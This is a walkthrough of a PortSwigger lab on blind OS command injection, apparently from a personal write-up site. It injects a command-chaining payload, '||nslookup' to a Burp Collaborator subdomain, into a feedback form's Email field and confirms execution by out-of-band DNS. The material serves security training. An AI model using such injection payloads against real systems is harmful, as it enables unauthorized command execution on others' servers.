> For the complete documentation index, see [llms.txt](https://kruknight.gitbook.io/daemon-of-hacking/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kruknight.gitbook.io/daemon-of-hacking/writeups/portswigger-labs/os-command-injection/blind-os-command-injection-with-out-of-band-interaction.md).

# Blind OS command injection with out-of-band interaction

## Lab Description

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2FaHhq2FmkIQxBrLfWDOpe%2Fimage.png?alt=media&amp;token=7add9150-0cc1-4b4e-ac3c-c873becaa341" alt=""><figcaption></figcaption></figure>

## Walkthrough

### **Step 1: Understanding the Feedback Functionality**

The Submit Feedback page contains four input fields:

* Name
* Email
* Subject
* Message

Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions via DNS lookups to Burp Collaborator.

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2FnXMuHMj58NrLmPadSo6V%2Fimage.png?alt=media&amp;token=689d61ca-c36c-4a3d-a93f-f5ea90091c45" alt=""><figcaption></figcaption></figure>

### **Step 2: Intercepting the Feedback Request**

Using Burp Suite, intercept the HTTP request when submitting feedback. The intercepted request will contain parameters corresponding to the form inputs.

**Objective:** Modify one of these parameters to execute a payload that triggers a DNS lookup to Burp Collaborator.

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2FgSqb1pSY3J5s3ru4Hyq1%2Fimage.png?alt=media&amp;token=d3b7781b-652a-4cb0-a400-703fa33fc973" alt=""><figcaption></figcaption></figure>

### **Step 3: Crafting and Injecting the Payload**

In the **Email** field, inject the following payload:

```
||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
```

This payload triggers a DNS lookup for the subdomain generated by Burp Collaborator, confirming that the server executes commands.

#### **Payload Breakdown**:

* **`||`**: Ends the existing shell command.
* **`nslookup`**: A command to perform DNS lookups.
* **`x.BURP-COLLABORATOR-SUBDOMAIN`**: Replaces `x` with the generated subdomain for monitoring.

Submit the request with the modified payload.

* The server responds with **200 OK**, indicating the payload was executed.

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2Fbnha6xZ3m2wSHeFnRQas%2Fimage.png?alt=media&amp;token=6461468e-16e0-4eeb-a549-ab67ef5ea84e" alt=""><figcaption></figcaption></figure>

### **Step 4: Verifying Out-of-Band Interaction**

Switch to the **Burp Collaborator** tab and click **Poll now**.

* Observe DNS requests generated by the server to your subdomain.

<figure><img src="https://2387347627-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F47EuhANOY5sIuDySBX97%2Fuploads%2FCSEZJSPtUTwODY9e0FxG%2Fimage.png?alt=media&amp;token=63047449-6050-4058-9866-4cd9761fc5ec" alt=""><figcaption></figcaption></figure>

## Why Use Out-of-Band Interaction?

When the server does not return command output or write it to an accessible location, OOB interaction is the best way to verify that a command was executed. DNS lookups leave a trace on external systems, enabling confirmation of blind vulnerabilities without requiring direct output.
